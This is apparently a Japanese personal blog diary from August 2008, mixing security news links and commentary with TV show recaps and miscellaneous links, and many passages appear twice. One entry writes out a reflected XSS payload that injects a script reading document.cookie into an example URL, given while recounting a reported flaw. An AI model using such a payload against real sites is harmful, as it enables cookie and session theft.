みんなそれぞれに気遣ってるんだ」これに対するヤマジの返事(↓)。 さらにカチンと来るこーすけ。(^-^;ヤマジ「こーすけも ただはしゃいでるだけじゃなかったんだね。 偉いなぁ。 私よりたぶん3カ月くらいまだ 生きてないもんね。 私より生きてない人がすごい考えてるんだな」それでも反省はしたのか、ヤマジ、シュレックを呼び出して謝る。ヤマジ「私さぁ 1度シュレックにキレちゃったことがあったじゃんかー。 気持ちに全然余裕がなくて。 それさぁやっとわかったのがさぁ。 例えばシュレックが私を拾わなくても 1人で行動するっていう選択権もあったはずじゃんか? 明らかに自分のこと全部棚に上げて、シュレックに全部あたり散らしてるだけだから。 もう本当ごめんなさい」よっことこーすけ、リタイアしないよう励ましてから急激に親密に。こーすけ「7コ年 離れてんじゃん? 例えばだよ 7コ 下の男は恋愛感情に入る? ガキ扱いしない?」 よっこ「しーないよっ!」スタッフに、よっこへの想いを打ち明けるこーすけ。こーすけ「もしよっこと付き合ったらっていうのを考えると すごいいろんな想像がバァーッ膨らんで。 (よっこの存在が)もう今かなり大きくなってますね」翌日の夜、久しぶりにお酒を飲んで盛り上がるメンバー。 こーすけとよっこがワゴンの中でじゃれ合うのを見て、こーすけに想いを寄せる桃、辛そう。 次週は、連鎖する片想いが、切ない結末に向かって加速する!らしいです。orz⇒* 今週のあいのり
、 * あいのりウラ話(ヤマジの日記)
- まっちゃさん
経由。 MBSDさんのセキュリティ診断結果の統計情報と、対策方法のクイズ。関連(?!): * Webサイトのセキュリティ診断:傾向分析レポート2008 (NRIセキュア)
[雑談] いろいろ。
- IE8の話がきけるのは、まっちゃ445だけ! (葉っぱ日記)
- 恋をすると、脳の処理能力もアップする? (NBオンライン)
- PSPを魔改造した「PSPケータイ」が登場しました (GIGAZINE)
- なぜクロールは「自由形」から独立できないの? (ExciteBit)
- エンジンの総排気量はなぜ中途半端? (ExciteBit)
- 水泳板に予言者出現 (日刊スレッドガイド)
- 新入社員指導で「やらないようにしよう」と気を付けていることランキング (goo)
- 世界最小の本当に食べることができるハンバーガーセット (GIGAZINE)
- コラム: それでもMacを買う? (ITmedia)
- 10万円以下の軽量・小型PCをどう見るか?--出そろった小型ノートPCを比較 (CNET)
[TV][あいのり] #414 DOMINOマリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。こーすけのことが気になる桃。 自分に思いを寄せてくれる海についてスタッフに語る。桃「まぁ嬉しいことは嬉しいんですよ。 (海は)すごい優しいし。 たぶん超尽くしてくれるし。 いいと思うんですけど・・・ 好きにはならないかなぁっていう感じですかね。 ・・・そんなに親密ですか?よっことこーすけ」新メンバーのヤマジが問題行動を連発。 メンバー、ヤマジに苛立つ。ヤマジ「食べ物いらないから 飲み物 コーラ コーラ!コーラ!」ヤマジ「海とこーすけ よくさ積極的に誘ってるじゃんあの2人を。 シュレックはあの2人 誘わないの? 余った私をこの人でいいやって拾ってるように見えるからさ。 私達やたらツーショット多いじゃん。 私 旅参加して 拾われてる・・・あっこいつ余ってるからこいつでいいやみたいな。 だっていっつも1番最後に私の名前を呼ぶじゃん」ヤマジ以外のメンバー全員で話し合い、こーすけからヤマジに「注意」することが決定。こーすけ「ヤマジ同じ年で いろいろ聞いててあり得ないなって思うこといっぱいあるんだ。 自分では何も思わない?シュレックに言ったこととか。 シュレックの甘さに甘えて そういうひどいこと言うのはすげぇ許せねぇんだ。 シュレックに悪かったなって気持ちある? あいのり貧乏旅行で ギリギリのお金でみんなで生活していくのね。 それなのに『あれが飲みたい』とか。 俺そういうの すんごい気に入らないんだ。 1つ1つの発言に悪気がないのかもしれないけど たかが一言だろうがみんな我慢してることだし みんなそれぞれに気遣ってるんだ」これに対するヤマジの返事(↓)。 さらにカチンと来るこーすけ。(^-^;ヤマジ「こーすけも ただはしゃいでるだけじゃなかったんだね。 偉いなぁ。 私よりたぶん3カ月くらいまだ 生きてないもんね。 私より生きてない人がすごい考えてるんだな」それでも反省はしたのか、ヤマジ、シュレックを呼び出して謝る。ヤマジ「私さぁ 1度シュレックにキレちゃったことがあったじゃんかー。 気持ちに全然余裕がなくて。 それさぁやっとわかったのがさぁ。 例えばシュレックが私を拾わなくても 1人で行動するっていう選択権もあったはずじゃんか? 明らかに自分のこと全部棚に上げて、シュレックに全部あたり散らしてるだけだから。 もう本当ごめんなさい」よっことこーすけ、リタイアしないよう励ましてから急激に親密に。こーすけ「7コ年 離れてんじゃん? 例えばだよ 7コ 下の男は恋愛感情に入る? ガキ扱いしない?」 よっこ「しーないよっ!」スタッフに、よっこへの想いを打ち明けるこーすけ。こーすけ「もしよっこと付き合ったらっていうのを考えると すごいいろんな想像がバァーッ膨らんで。 (よっこの存在が)もう今かなり大きくなってますね」翌日の夜、久しぶりにお酒を飲んで盛り上がるメンバー。 こーすけとよっこがワゴンの中でじゃれ合うのを見て、こーすけに想いを寄せる桃、辛そう。 次週は、連鎖する片想いが、切ない結末に向かって加速する!らしいです。orz⇒* 今週のあいのり
、 * あいのりウラ話(ヤマジの日記)
2008/08/12(火)火曜日ー。(私はマルチタスクではありませぬ。orz)
[雑談] * 米研究者、完全な「光学迷彩」技術の開発に成功 (Technobahn)
人間がすっぽり包まれるサイズのマントとか、早く出来ると面白いだろうなぁ〜。(^-^)[雑談] * 「足跡花火」、実はCGだった 北京五輪開会式 (asahi.com)
人間がすっぽり包まれるサイズのマントとか、早く出来ると面白いだろうなぁ〜。(^-^)[雑談] * 「足跡花火」、実はCGだった 北京五輪開会式 (asahi.com)
textile北京五輪の開会式の…巨人の足跡を表現した花火は、…過去の映像をコンピューター・グラフィックス(CG)の技術を使って組み合わせたという。なにこの捏造w なにこの言い訳w →「生中継する際、合成映像を使うことは普通にあることだ」
2008/08/13(水)水曜日ー。(スケジュールをNOPで埋めたいw)
[セキュリティ] * MS月例パッチ11件公開、IEやWordの脆弱性に対処 (ITmedia)
自動で更新情報を拾ってくるCGI(↓)、いちおう今月もおおむね動いていたみたい。
[雑談] ぺきんっ
[セキュリティ] * セキュリティアナリストコラム: IPSは“魔法の箱”か (@IT)
ラックの川口さんのコラム。 さりげなく、まっちゃ139を紹介してくれてますよ〜♪[雑談] * お先に失礼したもん勝ち 「お先に失礼しま〜す」で遊んでみた (ExciteBit)
にょー。 仕事を押し付け合うゲームですかぃ?w 子供たち喜ぶのかなぁ?!(^-^;[セキュリティ] * ナチュラムの情報漏えい事件では顧客のパスワードが平文で流出していたことが発覚 (Web屋のネタ帳)
このサイトに限らず、パスワードリマインダ(「パスワードを忘れた方はこちら」)で問い合わせると、メールで自分のパスワードが返送されてくるサイトがまだまだ存在していますね。(←もしかして暗号化はされているのかも知れませんが、ハッシュ化はされていない証拠。) これは、* HASHコンサルティングの徳丸さん
に、どのハッシュ関数がお勧めなのかコンサルティングして貰わなくてはっ!(ちがうw[雑談] いろいろ。
自動で更新情報を拾ってくるCGI(↓)、いちおう今月もおおむね動いていたみたい。
- マイクロソフト製品セキュリティ情報ページ (日本語版) by yamagata21
- マイクロソフト製品セキュリティ情報ページ (英語版) by yamagata21
[雑談] ぺきんっ
- 【北京五輪】 世界中の報道陣に配られたプレスキットの携帯ラジオ、五輪ロゴを剥がすとなぜか「小倉優子」グラビア写真が (痛いニュース)
- 【北京五輪】 9歳少女の歌も“口パク” 実際歌ったのは別の7歳少女…五輪開会式、“花火がCG”に続き発覚 (痛いニュース)
- 少女の歌声は「口パク」 五輪開会式、舞台裏に別の子 (asahi.com)
- 北京オリンピックの開会式にブルースクリーンが登場していた (GIGAZINE)
[セキュリティ] * セキュリティアナリストコラム: IPSは“魔法の箱”か (@IT)
ラックの川口さんのコラム。 さりげなく、まっちゃ139を紹介してくれてますよ〜♪[雑談] * お先に失礼したもん勝ち 「お先に失礼しま〜す」で遊んでみた (ExciteBit)
にょー。 仕事を押し付け合うゲームですかぃ?w 子供たち喜ぶのかなぁ?!(^-^;[セキュリティ] * ナチュラムの情報漏えい事件では顧客のパスワードが平文で流出していたことが発覚 (Web屋のネタ帳)
このサイトに限らず、パスワードリマインダ(「パスワードを忘れた方はこちら」)で問い合わせると、メールで自分のパスワードが返送されてくるサイトがまだまだ存在していますね。(←もしかして暗号化はされているのかも知れませんが、ハッシュ化はされていない証拠。) これは、* HASHコンサルティングの徳丸さん
に、どのハッシュ関数がお勧めなのかコンサルティングして貰わなくてはっ!(ちがうw[雑談] いろいろ。
- グルジアへのDoS攻撃は“サイバー戦争”か (ITmedia)
- ネットワークへも侵攻: グルジアの紛争、サイバー戦争に発展か (ITmedia)
- Dell、バッテリー駆動19時間のノートPC発表 (ITmedia)
- レーザー・レーサーはオープン・イノベーションの典型例だ (sakumaco)
- PS3にWindows Vistaをインストールして起動してみたムービー (GIGAZINE)
- 合コンで異性に熱く語られるとウザいと思う話題ランキング (goo)
- 「たまたま」? 坂口、圧巻の1回2本塁打 (スポニチ)
- 【☆ニコニコオーケストラ☆】ホールで『流星群』を演奏してみた
2008/08/14(木)木曜日ー。(この世の女性の数が少なすぎるから...)
[セキュリティ] * マサチューセッツ連邦地裁、地下鉄のセキュリティ脆弱性に関するプレゼンに仮差し止め命令 (computerworld.jp)
「* DEFCON 16
」で発表が行われるはずだった、「The Anatomy of a Subway Hack: Breaking Crypto RFIDs&Magstripes of Ticketing Systems(地下鉄ハックの詳細:切符システムの暗号化されたRFIDと磁気ストライプを破る)」と題するプレゼンテーションが裁判所に差止め命令を受けていたそうです。 紹介文の冒頭は、「地下鉄にいつもただで乗りたいと思いますか?」という発表内容。(@_@)[雑談] * 猫の抜け毛で可愛い雑貨づくり (ExciteBit)
この発想は無かったw 猫さんが飲み込んでしまわないよう隔離しなくては?!(^-^;[セキュリティ] * プログラミングキャンプの講義資料を公開します (amachangさん)
プログラミングキャンプ講師のamachangさんが資料を公開されています♪ これは素晴らしい試み。 セキュリティキャンプ側も資料の公開があれば良いのになぁ。 やっぱり悪用されることとか考えると公開しにくいのかな? どこかの経路から手に入れられないかしら。(ぉ関連: * JavaScriptでテトリスみたいなゲームを作ろう! - JavaScript入門講座資料
[雑談] いろいろ。
「* DEFCON 16
」で発表が行われるはずだった、「The Anatomy of a Subway Hack: Breaking Crypto RFIDs&Magstripes of Ticketing Systems(地下鉄ハックの詳細:切符システムの暗号化されたRFIDと磁気ストライプを破る)」と題するプレゼンテーションが裁判所に差止め命令を受けていたそうです。 紹介文の冒頭は、「地下鉄にいつもただで乗りたいと思いますか?」という発表内容。(@_@)[雑談] * 猫の抜け毛で可愛い雑貨づくり (ExciteBit)
この発想は無かったw 猫さんが飲み込んでしまわないよう隔離しなくては?!(^-^;[セキュリティ] * プログラミングキャンプの講義資料を公開します (amachangさん)
プログラミングキャンプ講師のamachangさんが資料を公開されています♪ これは素晴らしい試み。 セキュリティキャンプ側も資料の公開があれば良いのになぁ。 やっぱり悪用されることとか考えると公開しにくいのかな? どこかの経路から手に入れられないかしら。(ぉ関連: * JavaScriptでテトリスみたいなゲームを作ろう! - JavaScript入門講座資料
[雑談] いろいろ。
- ITエリートのアツ〜イ夏合宿、今年も開幕「セキュリティ&プログラミングキャンプ2008」
- 怪しいアンケートに注意! 本人に無断でFX口座を開設する悪徳業者出現 (MYCOM)
- 盗難されたPS3、PlayStation Networkを通じて発見される (/.jp)
- 豪女性、夫の「浮気の証拠」をネットオークションに (ITmedia)
- 庁内放送「ミサイルが飛んでくる!」、実は誤報…愛知県庁 (読売新聞)
- 「VMware ESX 3.5 Update 2」に時限爆弾式の不具合--修正パッチが公開に (CNET)
- あぁ、俺ブサイクなんだと気づいた瞬間 (VIPPERな俺)
- ストーカービュー? 公道か... - えーマジ○○ ○○が許されるのは○○だよねー
- Google、日本人向けに「70センチ身長伸びるシークレットブーツ」開発 (bogusnews)
- 41時間エレベーターに閉じこめられた人の一部始終が映っているムービー (GIGAZINE)
- 人身事故という名の「電車飛び込み自殺」 「遺族に1億円請求」は都市伝説か
- ぼくらのキスマークを消す方法 (ライフハッカー)
2008/08/15(金)金曜日ー。(帰りのバスに潜り込みたい...)
[セキュリティ] セキュリティ&プログラミングキャンプ2008昨日の* amachangさん20080814#p03
に続けてぞくぞくと講義内容公開中?(^-^)
[雑談] 「銀は金よりも良いと書く」「銀は金よりも良いと書く」とテレビで言っていたけれど、少し「点」が足りない気がする。(ぉ[出来事] * 「ミサイルが飛んでくる」とわかったときには、何をすべきか (/.jp)
弾頭の種類によって取るべき行動が違いますが、事前に種類を知ることは出来ませんw関連: * かながわの国民保護 - 武力攻撃やテロから身を守る (神奈川県)
**[pdf]**[雑談] * 友達をつくるためのお菓子的なソフトの必要性 (tx別館)
に続けてぞくぞくと講義内容公開中?(^-^)
- プログラミングキャンプ宣言、デバッグ、アルゴリズムとデータ構造 (吉岡弘隆さん)
- 解析クラス「ハードディスク解析」 今年の内容 (Hideaki Iharaさん)
[雑談] 「銀は金よりも良いと書く」「銀は金よりも良いと書く」とテレビで言っていたけれど、少し「点」が足りない気がする。(ぉ[出来事] * 「ミサイルが飛んでくる」とわかったときには、何をすべきか (/.jp)
弾頭の種類によって取るべき行動が違いますが、事前に種類を知ることは出来ませんw関連: * かながわの国民保護 - 武力攻撃やテロから身を守る (神奈川県)
**[pdf]**[雑談] * 友達をつくるためのお菓子的なソフトの必要性 (tx別館)
textileそれは「ウィルス対策ソフト」の類なのです。コンビニとかいくと1シリアルで2−3台くらいまで使えるのが出てますよね。あれもパピコなんですよ。メーカーは…あえて「友達に」とは言ってないけど。会社とかで2人友達ができるかも!ちょw 他人に渡したらライセンス違反www (“1家庭内”とか条件あります。)[雑談] いろいろ。
- ネズミの脳みそを組み込んだロボットが完成 (痛いニュース)
- がんばれ!アドミンくん 第136話 ユビキタスな毎日 (@IT)
- 愛されていると感じる瞬間ランキング (gooランキング)
- 米国のインターネット接続速度は100年経っても日本に追いつけない (/.jp)
- 「若者はパソコンよりケータイのほうが速く打てる」は大嘘だよね? (狐の王国)
2008/08/16(土)土曜日ー。(恋はするものじゃない。落ちるものだ。)
[雑談] アウトプットの出来ない人間なんて、要らない。orz >自分[占い] * 価値観集積ロボットシリーズ恋愛編 「恋愛頭脳」
MOJOさん経由。 総合判断:可、恋愛観レベル:高校生(14段階中6番目)でした。 * 2004年にやったとき20041007#p06
は、総合判断:適、恋愛観レベル:大人(14段階中5番目)だったらしいので、この 4年間で、前よりもさらにレベルダウンしているということでしょうか?orz[雑談] ほんとに申し訳ない気持ちで一杯です。orz何もお返しが出来ないまま帰って来てしまいました。 あんなに刺激になる、楽しい一日をプレゼントして貰ったのに。 そう思うなら何かしゃべれ!と自分でも思うのですが、それでもしゃべれないのがヤマガタ・クオリティ。 ほんとゴメンナサイ。 最後まで参加してみたかったな…。
MOJOさん経由。 総合判断:可、恋愛観レベル:高校生(14段階中6番目)でした。 * 2004年にやったとき20041007#p06
は、総合判断:適、恋愛観レベル:大人(14段階中5番目)だったらしいので、この 4年間で、前よりもさらにレベルダウンしているということでしょうか?orz[雑談] ほんとに申し訳ない気持ちで一杯です。orz何もお返しが出来ないまま帰って来てしまいました。 あんなに刺激になる、楽しい一日をプレゼントして貰ったのに。 そう思うなら何かしゃべれ!と自分でも思うのですが、それでもしゃべれないのがヤマガタ・クオリティ。 ほんとゴメンナサイ。 最後まで参加してみたかったな…。
2008/08/17(日)日曜日ー。(「正しく使って貰えないRC4が可哀想…。」)
[雑談] いろいろ。
(* まっちゃさん
経由。)
(* ともちゃ
経由。)
- ひと足先に選ぶ次世代のMVE: FFR鵜飼さん (@type)
(* まっちゃさん
経由。)
- Googleカーの横暴を止めるために僕ができるたった一つの事 (あけろすにっき)
- slコマンド: 懐かしのSL… (log.utashiro.com)
- ヤバイ。NAMCOヤバイ。まじでヤバイよ、マジヤバイ。 (アルファモザイク)
- Blu-rayディスクの耐久性を極限までチェックするムービー (GIGAZINE)
- 虫「むぅむぅ」 (ハムスター速報)
- プログラマ男子取扱説明書 (WeBLoG)
(* ともちゃ
経由。)
- 「ヱヴァンゲリヲン」を本気で踊ってみた (ニコニコ動画)
- カルビのステーキ化を考えてみる (ExciteBit)
- 中国独自の高密度光ディスク「CBHD」、いよいよ製品登場 (/.jp)
- 28歳処女が初彼と旅行行くよ(´・ω・`) (はてな匿名ダイアリー)
- こなたを嫁にするのは止めたほうがいいらしい (はてな匿名ダイアリー)
2008/08/18(月)月曜日ー。(「おっけーかぃ?」がステキでした☆)
[セキュリティ] * DNSの脆弱性が影響: OpenIDにフィッシングの危険発覚 (ITmedia)
DNSキャッシュポイズニングと、DebianのOpenSSLの乱数が弱かった件の組み合わせ。 偽の「OpenIDプロバイダー」(OP)を立てて、そこに誘導することでログイン情報を奪取できるという指摘。 もはやOpenIDに限らず、DNSにコンテンツを注入できる時点で大抵終わってる。(汗[雑談] * 実況「おや?室伏どうした?室伏の様子がおかしいぞ?!」 (人生VIP職人)
なに、この無理矢理なオールスターキャストw 吹いたw 実況と解説はほんと言いそうw[セキュリティ] * リモートからコード実行の恐れ:Windowsに未修正の脆弱性 (ITmedia)
「Nslookup.exe」に脆弱性があって、リモートから任意のコードを実行可能だそうです。 これを聞いて、最初、頭の中に「?」がたくさん並んだwのですが、* デモ動画(by Ivan Sanchez)
を観たところ、どうやら悪意あるドメインに対してゾーン転送を要求するとヤラれる感じのようですね。 面白い、けど…w[雑談] * 芸能界を取り巻くペット事情: 萩原流行さん (日刊サイゾー)
俳優・萩原流行さんが、愛猫・小鉄くんとの出会いと別れについて語っている記事。[出来事] * 「au one net」WEBメールのサービス再開について (KDDI)
関連: * auメール、誤って廃棄も 特定文字の設定で (47NEWS)
[雑談] いろいろ。
←「BASP21」は製品版(Pro)がありますね♪
←がんばれ!中の人。
←コールセンターから。
←大人な悩み。
←安定剤を…(ぉ
←男ってタンジュン。[TV][あいのり] #415 恋は蜃気楼のように・・・マリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。自由時間にこーすけがよっこを誘う。 二人はここのところいい感じ。こーすけ「面白いよね。 7コも離れてたらね。 7コって小学校でも会わないからね」よっこ「そうだよね。 中2で 小1だ。 ヤダもう」こーすけ「すげぇな。 年上のお姉さんとかだったら甘えたいなぁとか思うけど、なんかよっこ見てたら、あっ守ってあげたいって思う」よっこ「ははは。 ほんとー? うれしいなそれは。 ふふふ」同じ頃、海が桃を誘う。 海は桃が好きだが、桃はこーすけが気になっている。海「桃見てたらね。 強がってるんだけど弱いんだよね。 守ってあげたくなっちゃう。 日本に帰って、桃もジム好きって言ったじゃん? 一緒に行きたいしさ。 なんかストレートでしか気持ちが表現できなくなる」その日の夜、海が桃にポエムをプレゼント・・・。 (桃は若干困り気味。(^-^;)海ポエム“『砂漠』 この長い道のりをずっと1人で歩いてきた。 つらく悲しく 時にはくじけそうにもなった。 だけど オアシスはいまだに見つからない。 君に出逢って オアシスは見つけるものではなく気付くものだとそう感じた。 僕のオアシスは隣にあった”久しぶりに桃とこーすけが二人きりに。 桃、こーすけに探りを入れてみる。桃「いろんな事を相談してよ これからも。 どんなことでも。 恋愛でよ? この旅で こーすけがもし・・・好きな人ができたりしても、何でも相談してほしいよ」こーすけ「正直に言うけど、最近よっこのことが気になるんだ。 すごい大切なんだよね。 なんかよっこ見てると あぁ守ってあげたいなって思う」こーすけのよっこへの気持ちを確認してしまい、桃、落ち込む。 自暴自棄に。桃の日記“海の事が急に愛しくなって一緒に日本に帰ってしまおうかと思った・・・”次週は、海が桃に告白?! 桃には妥協せずにちゃんと恋をして欲しいなぁ... (>_<)⇒* 今週のあいのり
、 * あいのりウラ話(海の日記)
DNSキャッシュポイズニングと、DebianのOpenSSLの乱数が弱かった件の組み合わせ。 偽の「OpenIDプロバイダー」(OP)を立てて、そこに誘導することでログイン情報を奪取できるという指摘。 もはやOpenIDに限らず、DNSにコンテンツを注入できる時点で大抵終わってる。(汗[雑談] * 実況「おや?室伏どうした?室伏の様子がおかしいぞ?!」 (人生VIP職人)
なに、この無理矢理なオールスターキャストw 吹いたw 実況と解説はほんと言いそうw[セキュリティ] * リモートからコード実行の恐れ:Windowsに未修正の脆弱性 (ITmedia)
「Nslookup.exe」に脆弱性があって、リモートから任意のコードを実行可能だそうです。 これを聞いて、最初、頭の中に「?」がたくさん並んだwのですが、* デモ動画(by Ivan Sanchez)
を観たところ、どうやら悪意あるドメインに対してゾーン転送を要求するとヤラれる感じのようですね。 面白い、けど…w[雑談] * 芸能界を取り巻くペット事情: 萩原流行さん (日刊サイゾー)
俳優・萩原流行さんが、愛猫・小鉄くんとの出会いと別れについて語っている記事。[出来事] * 「au one net」WEBメールのサービス再開について (KDDI)
textile本件は、WEBメールを構成しているシステムにおいて、複数のシステムを制御するパラメータの設定に誤りがあり、システムに例外的な処理が発生した場合に本不具合が発生しました…。いったい何が起きたのかぜんぜん想像がつかないやw これとは別件で、先週の金曜日に、同じ「au one net」で、メールの着信拒否や転送をする機能に不具合があって、必要なメールが届かなかったり、必要ないメールが転送されたりということもあったそうです。 こちらは、“「$」や「B」などの文字を条件として設定していた場合”とのことなので、きっと、ISO-2022-JP が……とか想像してみるw
関連: * auメール、誤って廃棄も 特定文字の設定で (47NEWS)
[雑談] いろいろ。
- ActiveServerPages時代にはhashもSQLインジェクションもすげーメジャーというわけではなかった (F’s Garage)
←「BASP21」は製品版(Pro)がありますね♪
- 受理スピードアップ? (水無月ばけらのえび日記)
←がんばれ!中の人。
- 無料かつ高機能!オンラインでがっつり画像編集できる『Pixlr』 (百式)
- 静止画をヒントにシーン全体を改変する「動画のフォトショップ」技術 (engadget)
- ドイツで個人情報大量流出、150万人分以上 (AFPBB)
←コールセンターから。
- 10代の抱く不安、「物価の上昇」や「環境問題」が上位に (ORICON)
←大人な悩み。
- 怒りを静める10の方法 (アルファルファモザイク)
←安定剤を…(ぉ
- エネルギーをムダに消費して「電気代の吸血鬼」になっている家電は? (GIGAZINE)
- 彼氏彼女の日記…男女のヤバイ違い (らばQ)
←男ってタンジュン。[TV][あいのり] #415 恋は蜃気楼のように・・・マリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。自由時間にこーすけがよっこを誘う。 二人はここのところいい感じ。こーすけ「面白いよね。 7コも離れてたらね。 7コって小学校でも会わないからね」よっこ「そうだよね。 中2で 小1だ。 ヤダもう」こーすけ「すげぇな。 年上のお姉さんとかだったら甘えたいなぁとか思うけど、なんかよっこ見てたら、あっ守ってあげたいって思う」よっこ「ははは。 ほんとー? うれしいなそれは。 ふふふ」同じ頃、海が桃を誘う。 海は桃が好きだが、桃はこーすけが気になっている。海「桃見てたらね。 強がってるんだけど弱いんだよね。 守ってあげたくなっちゃう。 日本に帰って、桃もジム好きって言ったじゃん? 一緒に行きたいしさ。 なんかストレートでしか気持ちが表現できなくなる」その日の夜、海が桃にポエムをプレゼント・・・。 (桃は若干困り気味。(^-^;)海ポエム“『砂漠』 この長い道のりをずっと1人で歩いてきた。 つらく悲しく 時にはくじけそうにもなった。 だけど オアシスはいまだに見つからない。 君に出逢って オアシスは見つけるものではなく気付くものだとそう感じた。 僕のオアシスは隣にあった”久しぶりに桃とこーすけが二人きりに。 桃、こーすけに探りを入れてみる。桃「いろんな事を相談してよ これからも。 どんなことでも。 恋愛でよ? この旅で こーすけがもし・・・好きな人ができたりしても、何でも相談してほしいよ」こーすけ「正直に言うけど、最近よっこのことが気になるんだ。 すごい大切なんだよね。 なんかよっこ見てると あぁ守ってあげたいなって思う」こーすけのよっこへの気持ちを確認してしまい、桃、落ち込む。 自暴自棄に。桃の日記“海の事が急に愛しくなって一緒に日本に帰ってしまおうかと思った・・・”次週は、海が桃に告白?! 桃には妥協せずにちゃんと恋をして欲しいなぁ... (>_<)⇒* 今週のあいのり
、 * あいのりウラ話(海の日記)
2008/08/19(火)火曜日ー。(りじぇくときゃんぷって何ですか?w)
[セキュリティ] * 「君たちは“世界を変える切符”を手にしている」---セキュリティ&プログラミングキャンプ2008 (ITPro)
まっちゃさんの「* なぜ、そこだけひらがな!!!!w
」に笑ったw >“はせがわようすけ氏”その葉っぱさんのところに、* 参加者や講師やチューターのブログや記事がまとまってます♪
関連: * 育てIT人材:中学高校生、大学生が合宿で熱い議論 (毎日.jp)
[雑談] * セキュリティ&プログラミングキャンプ2025に寄せられた科学技術庁長官の祝辞
講師もそうだけど、キャンプ卒業者から“スゴイ人”(政治家に限らず)出るだろうなぁ。(^-^)[セキュリティ] * PHP:session_set_save_handlerリファレンスマニュアルのサンプルにパス・トラバーサル脆弱性 (徳丸さん)
IPA に届け出たところ不受理になったそうです。 私も、昔、某アプリケーションサーバのオフィシャルサイトでの記述や、製品に同梱されていたサンプルに、軒並み、URL中へのスクリプト記述で XSS が発現する問題(http://example.jp/dir/file.ext という Webページを http://example.jp/dir/"><script>alert(document.cookie)</script>/.%2e/.%2e/file.ext として表示すると、FORM の action先が・・・みたいなw)が存在していて指摘したことがありましたが、芳しい反応が得られなかったことが…。 あくまでもサンプルですよ!的な反応。 それを見て開発者が真似したらどうするんだと問い詰めたいw[雑談] いろいろ。
まっちゃさんの「* なぜ、そこだけひらがな!!!!w
」に笑ったw >“はせがわようすけ氏”その葉っぱさんのところに、* 参加者や講師やチューターのブログや記事がまとまってます♪
関連: * 育てIT人材:中学高校生、大学生が合宿で熱い議論 (毎日.jp)
[雑談] * セキュリティ&プログラミングキャンプ2025に寄せられた科学技術庁長官の祝辞
講師もそうだけど、キャンプ卒業者から“スゴイ人”(政治家に限らず)出るだろうなぁ。(^-^)[セキュリティ] * PHP:session_set_save_handlerリファレンスマニュアルのサンプルにパス・トラバーサル脆弱性 (徳丸さん)
IPA に届け出たところ不受理になったそうです。 私も、昔、某アプリケーションサーバのオフィシャルサイトでの記述や、製品に同梱されていたサンプルに、軒並み、URL中へのスクリプト記述で XSS が発現する問題(http://example.jp/dir/file.ext という Webページを http://example.jp/dir/"><script>alert(document.cookie)</script>/.%2e/.%2e/file.ext として表示すると、FORM の action先が・・・みたいなw)が存在していて指摘したことがありましたが、芳しい反応が得られなかったことが…。 あくまでもサンプルですよ!的な反応。 それを見て開発者が真似したらどうするんだと問い詰めたいw[雑談] いろいろ。
- Webエンジニア武勇伝 第29回 竹迫良範氏 サイボウズ・ラボ (Web Career)
- 仔猫の声はいつ「ミャーミャー」から「ニャーオ」になるのか? (ExciteBit)
- ニコニコ市場で6000万円の仏壇のイタズラ注文→販売元「警察に被害届出す」
2008/08/20(水)水曜日ー。(TODO: 「プロトコルを理解する」&「ハートビートに気をつける」)
[出来事] * ユーザを不正サイトに誘導:中国大手ISPがDNSキャッシュ汚染 (ITmedia)
経由。 中国の大手ISP「China Netcom」でDNSキャッシュポイズニングが実際に発生。 存在しないドメインの名前解決をした場合に、悪質なコードが仕込まれたサイトに誘導されるらしい。[雑談] * ネットの祭りをリビングで再現 「ANOBAR」 (ASCII.jp)
テレビを見ながら、2ちゃんねるの実況板を表示するといった使い方が出来る製品ですw[セキュリティ] * 正規サイトに不正Flash広告掲載か:URLをコピペしたら悪質サイトに
「URLを選択して“ctrlとc”でコピーし、ペーストしようとするたびに、ウイルスと思われるリンクが出てくる」らしいですw 笑えるw たぶん、Flash のActionScript を使って、延々と該当のリンクをクリップボードにコピー(clipboard.setData?)してるだけでしょうね。 クリップボード乗っ取りと言うのは大げさかもw[雑談] * ヤマダ電機、とても不条理なアイドルの「撮影会」を開催 (GIGAZINE)
デジカメ購入者に対して三好絵梨香さんの撮影会を開催。 ただし撮影されたデータは持ち帰りできず、ベストショット1枚だけをプリントして持ち帰れるらしい。 デジカメの威力分からなくね?w[セキュリティ] * GmailのセッションIDを自動的に盗むツールが登場 (/.jp)
んー? HTTPSのセッション管理に用いているCookieにsecureフラグが付いてない話かな?
関連: * Gmail Account Hacking Tool (Hacking Truths)
[雑談] いろいろ。
- まっちゃさん
経由。 中国の大手ISP「China Netcom」でDNSキャッシュポイズニングが実際に発生。 存在しないドメインの名前解決をした場合に、悪質なコードが仕込まれたサイトに誘導されるらしい。[雑談] * ネットの祭りをリビングで再現 「ANOBAR」 (ASCII.jp)
テレビを見ながら、2ちゃんねるの実況板を表示するといった使い方が出来る製品ですw[セキュリティ] * 正規サイトに不正Flash広告掲載か:URLをコピペしたら悪質サイトに
「URLを選択して“ctrlとc”でコピーし、ペーストしようとするたびに、ウイルスと思われるリンクが出てくる」らしいですw 笑えるw たぶん、Flash のActionScript を使って、延々と該当のリンクをクリップボードにコピー(clipboard.setData?)してるだけでしょうね。 クリップボード乗っ取りと言うのは大げさかもw[雑談] * ヤマダ電機、とても不条理なアイドルの「撮影会」を開催 (GIGAZINE)
デジカメ購入者に対して三好絵梨香さんの撮影会を開催。 ただし撮影されたデータは持ち帰りできず、ベストショット1枚だけをプリントして持ち帰れるらしい。 デジカメの威力分からなくね?w[セキュリティ] * GmailのセッションIDを自動的に盗むツールが登場 (/.jp)
んー? HTTPSのセッション管理に用いているCookieにsecureフラグが付いてない話かな?
関連: * Gmail Account Hacking Tool (Hacking Truths)
[雑談] いろいろ。
- session_set_save_handlerのパストラバーサルで任意コマンドの実行が可能 (徳丸さん)
- PHPのSessionモジュールの脆弱性 (大垣靖男さん)
- プログラミングではホワイトリスティングが基本 (大垣靖男さん)
- グーグル・ストリートビューに関する取材 (弁護士 落合洋司さん)
- 激化するSQLインジェクション攻撃 - IBM SOC (ITPro)
- 「犯罪者に代わって商品受け取り」、アングラではびこる「ドロップ」 (ITPro)
- 「年収260万円」と言ったら彼女の両親に馬鹿にされた男性…ネットで話題に (痛いニュース)
- とんでもない配線をされてスパゲティみたいに絡まっているケーブル類の写真 (GIGAZINE)
- 本当にあったらすごいことになるかもしれないオリンピック競技いろいろ (GIGAZINE)
- スイーツ(笑)だらけの太平洋戦争 (神速VIP)
2008/08/21(木)木曜日ー。(まずコネクションを張ることが大事。)
